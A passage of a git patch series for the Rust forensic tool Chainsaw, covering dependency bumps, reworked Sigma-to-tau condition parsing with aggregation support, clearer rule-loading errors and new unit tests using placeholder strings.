"2.0.0-alpha.3" +version = "2.0.0-alpha.4" dependencies = [ "aho-corasick 0.7.18", "anyhow", @@ -1186,9 +1186,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.7.0" +version = "1.7.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28a9cf722f2c09f4a81b8367b0329a36067e845904e19ccee432b204ab96d191" +checksum = "7e0f34a4bc11778eb6faed8506f40bad0b1fb323b2538152c2e487b1b9b75b61" dependencies = [ "aho-corasick 0.7.18", "lazy_static", diff --git a/src/main.rs b/src/main.rs index 658e2ebb..def62e0f 100644 --- a/src/main.rs +++ b/src/main.rs @@ -353,7 +353,15 @@ fn run() -> Result<()> { } Err(e) => { failed += 1; - cs_eprintln!("[!] {}", e); + let file_name = match file + .display() + .to_string() + .strip_prefix(&path.display().to_string()) + { + Some(e) => e.to_string(), + None => file.display().to_string(), + }; + cs_eprintln!("[!] {}: {}", file_name, e); continue; } } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 377492e0..90370378 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -71,9 +71,18 @@ pub fn load_rule(path: &Path) -> crate::Result> { kind: Kind::Chainsaw, }] } else if let Ok(rules) = sigma::load(path) { - rules + let sigma = match rules + .into_iter() + .map(|y| serde_yaml::from_value::(y)) + .collect::, _>>() + { + Ok(rules) => rules, + Err(_) => { + anyhow::bail!("failed to load rule, run the linter for more information"); + } + }; + sigma .into_iter() - .filter_map(|r| serde_yaml::from_value(r).ok()) .map(|rule: Sigma| Rule { chainsaw: Chainsaw { name: rule.name, @@ -161,28 +170,25 @@ pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { vec![rule.filter] } Err(e) => { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - anyhow::bail!("{:?}: {}", file_name, e); + anyhow::bail!("{}", e); } }, Kind::Sigma => match sigma::load(path) { - Ok(yamls) => yamls - .into_iter() - .filter_map(|y| serde_yaml::from_value::(y).ok()) - .map(|r| Filter::Detection(r.tau.detection)) - .collect(), + Ok(yamls) => { + let sigma = yamls + .into_iter() + .map(|y| serde_yaml::from_value::(y)) + .collect::, _>>()?; + sigma + .into_iter() + .map(|r| Filter::Detection(r.tau.detection)) + .collect() + } Err(e) => { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; if let Some(source) = e.source() { - anyhow::bail!("{:?}: {} - {}", file_name, e, source); + anyhow::bail!("{} - {}", e, source); } else { - anyhow::bail!("{:?}: {}", file_name, e); + anyhow::bail!("{}", e); } } }, @@ -191,11 +197,7 @@ pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { vec![Filter::Detection(rule.tau.detection)] } Err(e) => { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - anyhow::bail!("{:?}: {}", file_name, e); + anyhow::bail!("{}", e); } }, }; diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index c51ee736..01080a02 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -1,4 +1,4 @@ -use std::collections::HashSet; +use std::collections::{HashMap, HashSet}; use std::fs::File; use std::io::prelude::*; use std::path::Path; @@ -226,6 +226,61 @@ fn parse_identifier(value: &Yaml, modifiers: &HashSet) -> Result { Ok(v) } +fn prepare_condition(condition: &str) -> Result<(String, Option)> { + if condition.contains(" | ") { + let (condition, agg) = condition + .split_once(" | ") + .expect("could not split condition"); + let mut parts = agg.split_whitespace(); + let mut fields = vec![]; + // NOTE: We only support count atm... + // agg-function(agg-field) [ by group-field ] comparison-op value + if let Some(kind) = parts.next() { + if let Some(rest) = kind.strip_prefix("count(") { + if let Some(field) = rest.strip_suffix(")") { + if !field.is_empty() { + fields.push(field.to_owned()); + } + } else { + anyhow::bail!("invalid agg function"); + } + } else { + anyhow::bail!("unsupported agg function - {}", kind); + } + } else { + anyhow::bail!("missing agg function"); + } + let mut part = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + if part == "by" { + let field = match parts.next() { + Some(field) => field, + None => anyhow::bail!("missing group field"), + }; + fields.push(field.to_owned()); + part = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + } + let number = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + Ok(( + condition.to_owned(), + Some(Aggregate { + count: format!("{}{}", part, number), + fields, + }), + )) + } else { + Ok((condition.to_owned(), None)) + } +} + fn prepare( detection: Detection, extra: Option, @@ -237,217 +292,77 @@ fn prepare( .and_then(|e| e.condition.clone()) .or_else(|| detection.condition.clone()); if let Some(c) = &condition { - if c == "all of them" { - let mut scratch = Sequence::new(); - for (_, v) in &detection.identifiers { - scratch.push(v.clone()); - } - if let Some(d) = extra { - for (_, v) in d.identifiers { - scratch.push(v); - } - } - let mut identifiers = Mapping::new(); - identifiers.insert("A".into(), scratch.into()); - detection = Detection { - condition: Some("all(A)".into()), - identifiers, - } - } else if c == "1 of them" { - let mut scratch = Sequence::new(); - for (_, v) in &detection.identifiers { - scratch.push(v.clone()); - } - if let Some(d) = extra { - for (_, v) in d.identifiers { - scratch.push(v); - } - } - let mut identifiers = Mapping::new(); - identifiers.insert("A".into(), scratch.into()); - detection = Detection { - condition: Some("of(A, 1)".into()), - identifiers, - } - } else { - let condition = match c { - Yaml::String(c) => c, - Yaml::Sequence(s) => { - if s.len() == 1 { - let x = s.iter().next().expect("could not get condition"); - if let Yaml::String(c) = x { - c - } else { - anyhow::bail!("condition must be a string"); - } + let mut conditions = vec![]; + match c { + Yaml::String(c) => conditions.push(c), + Yaml::Sequence(s) => { + if s.len() == 1 { + let x = s.iter().next().expect("could not get condition"); + if let Yaml::String(c) = x { + conditions.push(c) } else { anyhow::bail!("condition must be a string"); } - } - _ => anyhow::bail!("condition must be a string"), - }; - let condition = if condition.contains(" | ") { - let (condition, agg) = condition - .split_once(" | ") - .expect("could not split condition"); - let mut parts = agg.split_whitespace(); - let mut fields = vec![]; - // NOTE: We only support count atm... - // agg-function(agg-field) [ by group-field ] comparison-op value - if let Some(kind) = parts.next() { - if let Some(rest) = kind.strip_prefix("count(") { - if let Some(field) = rest.strip_suffix(")") { - if !field.is_empty() { - fields.push(field.to_owned()); - } - } else { - anyhow::bail!("invalid agg function"); - } - } else { - anyhow::bail!("unsupported agg function - {}", kind); - } } else { - anyhow::bail!("missing agg function"); + anyhow::bail!("condition must be a string"); } - let mut part = match parts.next() { - Some(part) => part, - None => anyhow::bail!("invalid aggregation"), - }; - if part == "by" { - let field = match parts.next() { - Some(field) => field, - None => anyhow::bail!("missing group field"), - }; - fields.push(field.to_owned()); - part = match parts.next() { - Some(part) => part, - None => anyhow::bail!("invalid aggregation"), - }; + } + _ => anyhow::bail!("condition must be a string"), + }; + let condition = if conditions.len() == 1 { + let (c, a) = conditions + .into_iter() + .map(|c| prepare_condition(c)) + .next() + .expect("could not get condition")?; + aggregate = a; + c + } else { + let mut scratch = Vec::with_capacity(conditions.len()); + for condition in conditions { + let (c, a) = prepare_condition(condition)?; + if a.is_some() { + anyhow::bail!("multiple aggregation expressions are not supported"); } - let number = match parts.next() { - Some(part) => part, - None => anyhow::bail!("invalid aggregation"), - }; - aggregate = Some(Aggregate { - count: format!("{}{}", part, number), - fields, - }); - condition - } else { - condition - }; - - let mut identifiers = detection.identifiers; - let mut index = 0; - let mut mutated = vec![]; - let mut parts = condition.split_whitespace(); - while let Some(part) = parts.next() { - let part = if let Some(part) = part.strip_prefix("(") { - mutated.push("(".to_owned()); - part - } else { - part - }; - match part { - "all" | "1" => { - if let Some(next) = parts.next() { - if next != "of" { - mutated.push(part.to_owned()); - mutated.push(next.to_owned()); - continue; - } + scratch.push(format!("({})", c)); + } + scratch.join(" or ") + }; - if let Some(ident) = parts.next() { - let mut bracket = false; - let ident = if let Some(ident) = ident.strip_suffix(")") { - bracket = true; - ident - } else { - ident - }; - if let Some(ident) = ident.strip_suffix("*") { - let mut scratch = vec![]; - let mut keys = vec![]; - for (k, _) in &identifiers { - if let Yaml::String(key) = k { - if key.starts_with(ident) { - keys.push(k.clone()); - } - } - } - for key in keys { - if let Some(v) = identifiers.get(&key) { - scratch.push(v.clone()); - } - } - if scratch.is_empty() { - anyhow::bail!("could not find any applicable identifiers"); - } - let key = format!("tau_{}", index); - if part == "all" { - mutated.push(format!("all({})", key)); - } else if part == "1" { - mutated.push(format!("of({}, 1)", key)); - } - identifiers.insert(Yaml::String(key), Yaml::Sequence(scratch)); - if bracket { - mutated.push(")".to_owned()); - } - index += 1; - continue; - } else { - if part == "all" { - mutated.push(format!("all({})", ident)); - } else if part == "1" { - mutated.push(format!("of({}, 1)", ident)); - } - if bracket { - mutated.push(")".to_owned()); - } - continue; - } + let mut identifiers = detection.identifiers; + if let Some(d) = extra { + for (k, v) in d.identifiers { + match identifiers.remove(&k) { + Some(i) => match (i, v) { + (Yaml::Mapping(mut m), Yaml::Mapping(v)) => { + for (x, y) in v { + m.insert(x, y); } + identifiers.insert(k, Yaml::Mapping(m)); } - } - _ => {} - } - mutated.push(part.to_owned()); - } - let condition = mutated.join(" "); - if let Some(d) = extra { - for (k, v) in d.identifiers { - match identifiers.remove(&k) { - Some(i) => match (i, v) { - (Yaml::Mapping(mut m), Yaml::Mapping(v)) => { - for (x, y) in v { - m.insert(x, y); - } - identifiers.insert(k, Yaml::Mapping(m)); - } - (Yaml::Sequence(s), Yaml::Mapping(v)) => { - let mut z = vec![]; - for mut ss in s.into_iter() { - if let Some(m) = ss.as_mapping_mut() { - for (x, y) in v.clone() { - m.insert(x, y); - } + (Yaml::Sequence(s), Yaml::Mapping(v)) => { + let mut z = vec![]; + for mut ss in s.into_iter() { + if let Some(m) = ss.as_mapping_mut() { + for (x, y) in v.clone() { + m.insert(x, y); } - z.push(ss); } - identifiers.insert(k, Yaml::Sequence(z)); + z.push(ss); } - (_, _) => anyhow::bail!("unsupported rule collection format"), - }, - None => { - identifiers.insert(k, v); + identifiers.insert(k, Yaml::Sequence(z)); } + (_, _) => anyhow::bail!("unsupported rule collection format"), + }, + None => { + identifiers.insert(k, v); } } } - detection = Detection { - condition: Some(Yaml::String(condition)), - identifiers, - } + } + detection = Detection { + condition: Some(Yaml::String(condition.to_owned())), + identifiers, } } Ok((detection, aggregate)) @@ -460,44 +375,17 @@ fn detections_to_tau(detection: Detection) -> Result { // Handle condition statement let condition = match detection.condition { Some(conditions) => match conditions { - Yaml::Sequence(s) => { - let mut parts = vec![]; - for s in s { - let s = match s.as_str() { - Some(s) => s.to_string(), - None => { - return Err(anyhow!("{:?}", s).context("unsupported condition")); - } - }; - if s.unsupported() { - return Err(anyhow!("{:?}", s).context("unsupported condition")); - } - parts.push(format!("({})", s)); - } - parts.join(" or ") - } - Yaml::String(s) => { - if s.unsupported() { - return Err(anyhow!(s).context("unsupported condition")); - } - s - } + Yaml::String(s) => s, u => { return Err(anyhow!("{:?}", u).context("unsupported condition")); } }, None => bail!("missing condition"), }; - det.insert( - "condition".into(), - condition - .replace(" AND ", " and ") - .replace(" NOT ", " not ") - .replace(" OR ", " or ") - .into(), - ); // Handle identifiers + // NOTE: We can be inefficient here because the tree shaker will do the hard work for us! + let mut patches = HashMap::new(); for (k, v) in detection.identifiers { let k = match k.as_str() { Some(s) => s.to_string(), @@ -508,75 +396,237 @@ fn detections_to_tau(detection: Detection) -> Result { continue; //bail!("timeframe based rules cannot be converted"); } - let mut multi = false; - let blocks = match v { - Yaml::Sequence(s) => { - multi = true; - s + match v { + Yaml::Sequence(sequence) => { + let mut blocks = vec![]; + let mut index = 0; + for entry in sequence { + let mapping = match entry.as_mapping() { + Some(mapping) => mapping, + None => bail!("keyless identifiers cannot be converted"), + }; + let mut collect = true; + let mut seen = HashSet::new(); + let mut maps = vec![]; + for (f, v) in mapping { + let f = match f.as_str() { + Some(s) => s.to_string(), + None => bail!("[!] keys must strings"), + }; + let mut it = f.split('|'); + let mut f = it.next().expect("could not get field").to_string(); + if seen.contains(&f) { + collect = false; + } + seen.insert(f.clone()); + let modifiers: HashSet = it.map(|s| s.to_string()).collect(); + if modifiers.contains("all") { + f = format!("all({})", f); + } + let v = parse_identifier(&v, &modifiers)?; + let f = f.into(); + let mut map = Mapping::new(); + map.insert(f, v); + maps.push(map); + } + if collect { + let mut m = Mapping::new(); + for map in maps { + for (k, v) in map { + m.insert(k, v); + } + } + let ident = format!("{}_{}", k, index); + blocks.push((ident, m.into())); + } else { + let ident = format!("all({}_{})", k, index); + blocks.push(( + ident, + Yaml::Sequence(maps.into_iter().map(|m| m.into()).collect()), + )); + } + index += 1; + } + patches.insert( + k, + format!( + "({})", + blocks + .iter() + .map(|(k, _)| k) + .cloned() + .collect::>() + .join(" or "), + ), + ); + for (k, v) in blocks { + det.insert(k.into(), v.into()); + } + } + Yaml::Mapping(mapping) => { + let mut collect = true; + let mut seen = HashSet::new(); + let mut maps = vec![]; + for (f, v) in mapping { + let f = match f.as_str() { + Some(s) => s.to_string(), + None => bail!("[!] keys must strings"), + }; + let mut it = f.split('|'); + let mut f = it.next().expect("could not get field").to_string(); + if seen.contains(&f) { + collect = false; + } + seen.insert(f.clone()); + let modifiers: HashSet = it.map(|s| s.to_string()).collect(); + if modifiers.contains("all") { + f = format!("all({})", f); + } + let v = parse_identifier(&v, &modifiers)?; + let f = f.into(); + let mut map = Mapping::new(); + map.insert(f, v); + maps.push(map); + } + if collect { + let mut m = Mapping::new(); + for map in maps { + for (k, v) in map { + m.insert(k, v); + } + } + det.insert(k.into(), m.into()); + } else { + let ident = format!("all({})", k); + det.insert( + Yaml::String(k.clone()), + Yaml::Sequence(maps.into_iter().map(|m| m.into()).collect()), + ); + patches.insert(k, ident); + } } - Yaml::Mapping(m) => vec![Yaml::Mapping(m)], _ => { bail!("identifier blocks must be a mapping or a sequence of mappings"); } - }; - let mut maps = vec![]; - for v in blocks { - let mapping = match v.as_mapping() { - Some(m) => m, - None => bail!("keyless identifiers cannot be converted"), - }; - let mut fields = Mapping::new(); - for (f, v) in mapping { - let f = match f.as_str() { - Some(s) => s.to_string(), - None => bail!("[!] keys must strings"), - }; - let mut it = f.split('|'); - let mut f = it.next().expect("could not get field").to_string(); - let modifiers: HashSet = it.map(|s| s.to_string()).collect(); - if modifiers.contains("all") { - f = format!("all({})", f); - } - let v = parse_identifier(v, &modifiers)?; - let f = f.into(); - match fields.remove(&f) { - Some(x) => { - let s = match (x, v) { - (Yaml::Sequence(mut a), Yaml::Sequence(b)) => { - a.extend(b); - Yaml::Sequence(a) - } - (Yaml::Sequence(mut s), y) => { - s.push(y); - Yaml::Sequence(s) - } - (y, Yaml::Sequence(mut s)) => { - s.push(y); - Yaml::Sequence(s) + } + } + + let condition = condition + .replace(" AND ", " and ") + .replace(" NOT ", " not ") + .replace(" OR ", " or ") + .split_whitespace() + .map(|ident| { + let key = ident.trim_start_matches("(").trim_end_matches(")"); + match patches.get(key) { + Some(v) => ident.replace(key, v), + None => ident.to_owned(), + } + }) + .collect::>() + .join(" "); + + let condition = if condition == "all of them" { + let mut identifiers = vec![]; + for (k, _) in &det { + let key = k.as_str().expect("could not get key"); + match patches.get(key) { + Some(i) => identifiers.push(i.to_owned()), + None => identifiers.push(key.to_owned()), + } + } + identifiers.join(" and ") + } else if condition == "1 of them" { + let mut identifiers = vec![]; + for (k, _) in &det { + let key = k.as_str().expect("could not get key"); + match patches.get(key) { + Some(i) => identifiers.push(i.to_owned()), + None => identifiers.push(key.to_owned()), + } + } + identifiers.join(" or ") + } else { + let mut mutated = vec![]; + let mut parts = condition.split_whitespace(); + while let Some(part) = parts.next() { + let mut token = part; + while let Some(tail) = token.strip_prefix("(") { + mutated.push("(".to_owned()); + token = tail; + } + match token { + "all" | "1" => { + if let Some(next) = parts.next() { + if next != "of" { + mutated.push(token.to_owned()); + mutated.push(next.to_owned()); + continue; + } + + if let Some(next) = parts.next() { + let mut brackets = vec![]; + let mut identifier = next; + while let Some(head) = identifier.strip_suffix(")") { + brackets.push(")".to_owned()); + identifier = head; } - (Yaml::Mapping(_), _) | (_, Yaml::Mapping(_)) => { - bail!("could not merge identifiers") + if let Some(ident) = identifier.strip_suffix("*") { + let mut keys = vec![]; + for (k, _) in &det { + if let Yaml::String(key) = k { + if key.starts_with(ident) { + match patches.get(key) { + Some(i) => keys.push(i.to_owned()), + None => keys.push(key.to_owned()), + } + } + } + } + if keys.is_empty() { + anyhow::bail!("could not find any applicable identifiers"); + } + let expression = if token == "all" { + format!("({})", keys.join(" and ")) + } else if token == "1" { + format!("({})", keys.join(" or ")) + } else { + unreachable!(); + }; + mutated.push(expression); + } else { + let key = match patches.get(identifier) { + Some(i) => i, + None => identifier, + }; + let key = next.replace(identifier, &key); + if part == "all" { + mutated.push(format!("all({})", key)); + } else if part == "1" { + mutated.push(format!("of({}, 1)", key)); + } } - (a, b) => Yaml::Sequence(vec![a, b]), - }; - fields.insert(f, s); - } - None => { - fields.insert(f, v); + mutated.extend(brackets); + continue; + } } } + _ => {} } - maps.push(fields.into()); - } - if multi { - det.insert(k.into(), Yaml::Sequence(maps)); - } else { - det.insert(k.into(), maps.remove(0)); + mutated.push(token.to_owned()); } + mutated.join(" ").replace("( ", "(").replace(" )", ")") + }; + if condition.unsupported() { + return Err(anyhow!(condition).context("unsupported condition")); } + + det.insert("condition".into(), condition.into()); + tau.insert("detection".into(), det.into()); tau.insert("true_positives".into(), Sequence::new().into()); tau.insert("true_negatives".into(), Sequence::new().into()); + Ok(tau) } @@ -773,53 +823,7 @@ mod tests { "#; let detection: Detection = serde_yaml::from_str(&detection).unwrap(); - let detection = prepare(detection, None).unwrap(); - assert_eq!(detection, expected); - } - - #[test] - fn test_prepare_all_of_them() { - let expected = r#" - A: - - string: abcd - - string: efgh - condition: all(A) - "#; - let expected: Detection = serde_yaml::from_str(&expected).unwrap(); - - let detection = r#" - A: - string: abcd - B: - string: efgh - condition: all of them - "#; - - let detection: Detection = serde_yaml::from_str(&detection).unwrap(); - let detection = prepare(detection, None).unwrap(); - assert_eq!(detection, expected); - } - - #[test] - fn test_prepare_one_of_them() { - let expected = r#" - A: - - string: abcd - - string: efgh - condition: of(A, 1) - "#; - let expected: Detection = serde_yaml::from_str(&expected).unwrap(); - - let detection = r#" - A: - string: abcd - B: - string: efgh - condition: 1 of them - "#; - - let detection: Detection = serde_yaml::from_str(&detection).unwrap(); - let detection = prepare(detection, None).unwrap(); + let (detection, _) = prepare(detection, None).unwrap(); assert_eq!(detection, expected); } @@ -847,12 +851,12 @@ mod tests { let base: Detection = serde_yaml::from_str(&base).unwrap(); let detection: Detection = serde_yaml::from_str(&detection).unwrap(); - let detection = prepare(base, Some(detection)).unwrap(); + let (detection, _) = prepare(base, Some(detection)).unwrap(); assert_eq!(detection, expected); } #[test] - fn test_detection_to_tau() { + fn test_detection_to_tau_0() { let expected = r#" detection: A: @@ -866,12 +870,19 @@ mod tests { number: 30 string: iabcd B: - string: - - i*foobar* - - i*foobar - - ?foobar - - ifoobar* - condition: A and B + - string: i*foobar* + - string: i*foobar + - string: ?foobar + - string: ifoobar* + C_0: + string: i*foobar* + C_1: + string: i*foobar + C_2: + string: ?foobar + C_3: + string: ifoobar* + condition: A and all(B) and (C_0 or C_1 or C_2 or C_3) true_negatives: [] true_positives: [] "#; @@ -893,10 +904,69 @@ mod tests { string|endswith: foobar string|re: foobar string|startswith: foobar - condition: A and B + C: + - string|contains: foobar + - string|endswith: foobar + - string|re: foobar + - string|startswith: foobar + condition: A and B and C "#; let detection: Detection = serde_yaml::from_str(&detection).unwrap(); let detection = detections_to_tau(detection).unwrap(); assert_eq!(detection, *expected.as_mapping().unwrap()); } + + #[test] + fn test_detection_to_tau_all_of_them() { + let expected = r#" + detection: + A: + string: iabcd + B: + string: iefgh + condition: A and B + true_negatives: [] + true_positives: [] + "#; + let expected: serde_yaml::Value = serde_yaml::from_str(&expected).unwrap(); + + let detection = r#" + A: + string: abcd + B: + string: efgh + condition: all of them + "#; + + let detection: Detection = serde_yaml::from_str(&detection).unwrap(); + let detection = detections_to_tau(detection).unwrap(); + assert_eq!(detection, *expected.as_mapping().unwrap()); + } + + #[test] + fn test_detection_to_tau_one_of_them() { + let expected = r#" + detection: + A: + string: iabcd + B: + string: iefgh + condition: A or B + true_negatives: [] + true_positives: [] + "#; + let expected: serde_yaml::Value = serde_yaml::from_str(&expected).unwrap(); + + let detection = r#" + A: + string: abcd + B: + string: efgh + condition: 1 of them + "#; + + let detection: Detection = serde_yaml::from_str(&detection).unwrap(); + let detection = detections_to_tau(detection).unwrap(); + assert_eq!(detection, *expected.as_mapping().unwrap()); + } } From 48557ae0aed1ca243086909a0067cf061c03686a Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 21 Jun 2022 11:53:49 +0100 Subject: [PATCH 36/77] test: add a couple more tests for sigma parsing --- src/rule/sigma.rs | 62 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 01080a02..891a7e7d 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -969,4 +969,66 @@ mod tests { let detection = detections_to_tau(detection).unwrap(); assert_eq!(detection, *expected.as_mapping().unwrap()); } + + #[test] + fn test_detection_to_tau_all_of_selection() { + let expected = r#" + detection: + A: + string: iabcd + selection0: + string: iefgh + selection1: + string: iijkl + condition: A and (selection0 and selection1) + true_negatives: [] + true_positives: [] + "#; + let expected: serde_yaml::Value = serde_yaml::from_str(&expected).unwrap(); + + let detection = r#" + A: + string: abcd + selection0: + string: efgh + selection1: + string: ijkl + condition: A and all of selection* + "#; + + let detection: Detection = serde_yaml::from_str(&detection).unwrap(); + let detection = detections_to_tau(detection).unwrap(); + assert_eq!(detection, *expected.as_mapping().unwrap()); + } + + #[test] + fn test_detection_to_tau_one_of_selection() { + let expected = r#" + detection: + A: + string: iabcd + selection0: + string: iefgh + selection1: + string: iijkl + condition: A and (selection0 or selection1) + true_negatives: [] + true_positives: [] + "#; + let expected: serde_yaml::Value = serde_yaml::from_str(&expected).unwrap(); + + let detection = r#" + A: + string: abcd + selection0: + string: efgh + selection1: + string: ijkl + condition: A and 1 of selection* + "#; + + let detection: Detection = serde_yaml::from_str(&detection).unwrap(); + let detection = detections_to_tau(detection).unwrap(); + assert_eq!(detection, *expected.as_mapping().unwrap()); + } } From 550a94427e8c60e11b4cfd5545e74770a10a80af Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 21 Jun 2022 23:01:48 +0100 Subject: [PATCH 37/77] fix: bring in tau optimisation fixes --- Cargo.lock | 71 ++++++++++++++++++++++++-------------------- src/main.rs | 6 +++- src/rule/chainsaw.rs | 11 +++++-- src/rule/mod.rs | 8 +++-- 4 files changed, 59 insertions(+), 37 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 69e397b1..3f6f8c1b 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -31,9 +31,9 @@ dependencies = [ [[package]] name = "anyhow" -version = "1.0.57" +version = "1.0.58" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "08f9b8508dccb7687a1d6c4ce66b2b0ecef467c94667de27d8d7fe1f8d2a9cdc" +checksum = "bb07d2053ccdbe10e2af2995a2f116c1330396493dc1269f6a91d0ae82e19704" [[package]] name = "arrayref" @@ -273,9 +273,9 @@ dependencies = [ [[package]] name = "crossbeam-channel" -version = "0.5.4" +version = "0.5.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5aaa7bd5fb665c6864b5f963dd9097905c54125909c7aa94c9e18507cdbe6c53" +checksum = "4c02a4d71819009c192cf4872265391563fd6a84c81ff2c0f2a7026ca4c1d85c" dependencies = [ "cfg-if", "crossbeam-utils", @@ -294,26 +294,26 @@ dependencies = [ [[package]] name = "crossbeam-epoch" -version = "0.9.8" +version = "0.9.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1145cf131a2c6ba0615079ab6a638f7e1973ac9c2634fcbeaaad6114246efe8c" +checksum = "07db9d94cbd326813772c968ccd25999e5f8ae22f4f8d1b11effa37ef6ce281d" dependencies = [ "autocfg", "cfg-if", "crossbeam-utils", - "lazy_static", "memoffset", + "once_cell", "scopeguard", ] [[package]] name = "crossbeam-utils" -version = "0.8.8" +version = "0.8.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0bf124c720b7686e3c2663cf54062ab0f68a88af2fb6a030e87e30bf721fcb38" +checksum = "8ff1f980957787286a554052d03c7aee98d99cc32e09f6d45f0a814133c87978" dependencies = [ "cfg-if", - "lazy_static", + "once_cell", ] [[package]] @@ -532,13 +532,13 @@ dependencies = [ [[package]] name = "getrandom" -version = "0.2.6" +version = "0.2.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9be70c98951c83b8d2f8f60d7065fa6d5146873094452a1008da8c2f1e4205ad" +checksum = "4eb1a864a501629691edf6c15a593b7a51eebaa1e8468e9ddc623de7c9b58ec6" dependencies = [ "cfg-if", "libc", - "wasi 0.10.2+wasi-snapshot-preview1", + "wasi 0.11.0+wasi-snapshot-preview1", ] [[package]] @@ -549,9 +549,9 @@ checksum = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" [[package]] name = "hashbrown" -version = "0.11.2" +version = "0.12.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ab5ef0d4909ef3724cc8cce6ccc8572c5c817592e9285f5464f8e86f8bd3726e" +checksum = "db0d4cf898abf0081f964436dc980e96670a0f36863e4b83aaacdb65c9d7ccc3" [[package]] name = "heck" @@ -582,9 +582,9 @@ dependencies = [ [[package]] name = "indexmap" -version = "1.8.2" +version = "1.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6012d540c5baa3589337a98ce73408de9b5a25ec9fc2c6fd6be8f0d39e0ca5a" +checksum = "10a35a97730320ffe8e2d410b5d3b69279b98d2c14bdb8b70ea89ecf7888d41e" dependencies = [ "autocfg", "hashbrown", @@ -850,9 +850,9 @@ dependencies = [ [[package]] name = "proc-macro2" -version = "1.0.39" +version = "1.0.40" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c54b25569025b7fc9651de43004ae593a75ad88543b17178aa5e1b9c4f15f56f" +checksum = "dd96a1e8ed2596c337f8eae5f24924ec83f5ad5ab21ea8e455d3566c69fbcaf7" dependencies = [ "unicode-ident", ] @@ -895,9 +895,9 @@ dependencies = [ [[package]] name = "quote" -version = "1.0.18" +version = "1.0.20" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1feb54ed693b93a84e14094943b84b7c4eae204c512b7ccb95ab0c66d278ad1" +checksum = "3bcdf212e9776fbcb2d23ab029360416bb1706b1aea2d1a5ba002727cbcab804" dependencies = [ "proc-macro2", ] @@ -1175,9 +1175,9 @@ dependencies = [ [[package]] name = "syn" -version = "1.0.96" +version = "1.0.98" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0748dd251e24453cb8717f0354206b91557e4ec8703673a4b30208f2abaf1ebf" +checksum = "c50aef8a904de4c23c788f104b7dddc7d6f79c647c7c8ce4cc8f73eb0ca773dd" dependencies = [ "proc-macro2", "quote", @@ -1186,9 +1186,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.7.1" +version = "1.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e0f34a4bc11778eb6faed8506f40bad0b1fb323b2538152c2e487b1b9b75b61" +checksum = "bed380712238073b1762daaa5857d6245e4a2ae443ecf6dadcefd822fbbfd9e0" dependencies = [ "aho-corasick 0.7.18", "lazy_static", @@ -1283,11 +1283,12 @@ dependencies = [ [[package]] name = "time" -version = "0.1.43" +version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ca8a50ef2360fbd1eeb0ecd46795a87a19024eb4b53c5dc916ca1fd95fe62438" +checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" dependencies = [ "libc", + "wasi 0.10.0+wasi-snapshot-preview1", "winapi", ] @@ -1340,9 +1341,9 @@ dependencies = [ [[package]] name = "unicode-ident" -version = "1.0.0" +version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d22af068fba1eb5edcb4aea19d382b2a3deb4c8f9d475c589b6ada9e0fd493ee" +checksum = "5bd2fe26506023ed7b5e1e315add59d6f584c621d037f9368fea9cfb988f368c" [[package]] name = "unicode-segmentation" @@ -1368,7 +1369,7 @@ version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "dd6469f4314d5f1ffec476e05f17cc9a78bc7a27a6a857842170bdf8d6f98d2f" dependencies = [ - "getrandom 0.2.6", + "getrandom 0.2.7", "serde", ] @@ -1403,9 +1404,15 @@ checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" -version = "0.10.2+wasi-snapshot-preview1" +version = "0.10.0+wasi-snapshot-preview1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" + +[[package]] +name = "wasi" +version = "0.11.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fd6fbd9a79829dd1ad0cc20627bf1ed606756a7f77edff7b66b7064f9cb327c6" +checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423" [[package]] name = "winapi" diff --git a/src/main.rs b/src/main.rs index def62e0f..015d36b3 100644 --- a/src/main.rs +++ b/src/main.rs 